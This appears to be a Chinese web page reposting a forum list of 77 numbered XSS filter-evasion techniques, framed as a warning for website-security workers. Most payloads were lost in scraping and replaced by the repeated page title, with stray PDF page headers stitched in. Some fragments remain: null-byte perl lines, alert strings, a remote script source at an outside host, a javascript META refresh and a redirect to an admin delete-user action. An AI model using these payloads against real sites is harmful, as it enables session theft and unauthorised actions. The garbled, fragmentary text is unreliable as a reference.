XSS攻击汇总 做网站安全的朋友需要注意下

番茄系统家园 · 2022-03-01 10:07:02

(1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号
XSS攻击汇总 做网站安全的朋友需要注意下
(4)IMG标签大小写不敏感
XSS攻击汇总 做网站安全的朋友需要注意下
(5)HTML编码(必须有分号)
XSS攻击汇总 做网站安全的朋友需要注意下
(6)修正缺陷IMG标签
XSS攻击汇总 做网站安全的朋友需要注意下”>
(7)formCharCode标签(计算器)
XSS攻击汇总 做网站安全的朋友需要注意下
(8)UTF-8的Unicode编码(计算器)
XSS攻击汇总 做网站安全的朋友需要注意下
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
XSS攻击汇总 做网站安全的朋友需要注意下
(10)十六进制编码也是没有分号(计算器)
XSS攻击汇总 做网站安全的朋友需要注意下
(11)嵌入式标签,将Javascript分开
XSS攻击汇总 做网站安全的朋友需要注意下
(12)嵌入式编码标签,将Javascript分开
XSS攻击汇总 做网站安全的朋友需要注意下
(13)嵌入式换行符
XSS攻击汇总 做网站安全的朋友需要注意下
(14)嵌入式回车
XSS攻击汇总 做网站安全的朋友需要注意下
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
XSS攻击汇总 做网站安全的朋友需要注意下
(16)解决限制字符(要求同页面)










(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “XSS攻击汇总 做网站安全的朋友需要注意下”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “alert(\”XSS\”)\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
XSS攻击汇总 做网站安全的朋友需要注意下
(20)Non-alpha-non-digit XSS

(21)Non-alpha-non-digit XSS to 2


(22)Non-alpha-non-digit XSS to 3

(23)双开括号
alert(“XSS”);//
(24)无结束脚本标记(仅火狐等浏览器)

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签

(31)Input Image

(32)BODY Image

(33)BODY标签

(34)IMG Dynsrc
XSS攻击汇总 做网站安全的朋友需要注意下
(35)IMG Lowsrc
XSS攻击汇总 做网站安全的朋友需要注意下
(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)
  • XSS
    (40)IMG VBscript
    XSS攻击汇总 做网站安全的朋友需要注意下
    • XSS
      (41)META链接url
      URL=http://;URL=javascript:alert(‘XSS’);”>
      (42)Iframe

      (43)Frame
      12-7-1 T00LS - Powered by Discuz! Board
      https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
      (44)Table

      (45)TD

      (46)DIV background-image

      (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
      8&13&12288&65279)

      (48)DIV expression

      (49)STYLE属性分拆表达
      XSS攻击汇总 做网站安全的朋友需要注意下
      (50)匿名STYLE(组成:开角号和一个字母开头)

      (51)STYLE background-image
      CLASS=XSS>
      (52)IMG STYLE方式
      exppression(alert(“XSS”))’>
      (53)STYLE background

      (54)BASE

      (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

      (56)在flash中使用ActionScrpt可以混进你XSS的代码
      a=”get”;
      b=”URL(\”";
      c=”javascript:”;
      d=”alert(‘XSS’);\”)”;
      eval_r(a+b+c+d);
      (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上


      XSS

      (58)如果过滤了你的JS你可以在图片里添加JS代码来利用

      (59)IMG嵌入式命令,可执行任意命令
      XSS攻击汇总 做网站安全的朋友需要注意下
      (60)IMG嵌入式命令(a.jpg在同服务器)
      Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
      (61)绕符号过滤

      (62)

      (63)

      (64)

      (65)

      (66)12-7-1 T00LS - Powered by Discuz! Board
      https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6

      (67)
      PT SRC=”http://3w.org/xss.js”>

      (68)URL绕行
      XSS
      (69)URL编码
      XSS
      (70)IP十进制
      XSS
      (71)IP十六进制
      XSS
      (72)IP八进制
      XSS
      (73)混合编码
      tt p://6 6.000146.0×7.147/”">XSS
      (74)节省[http:]
      XSS
      (75)节省[www]
      XSS
      (76)绝对点绝对DNS
      XSS
      (77)javascript链接
      XSS
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/1979079TnbFe.html
猜你喜欢
最新应用
热门应用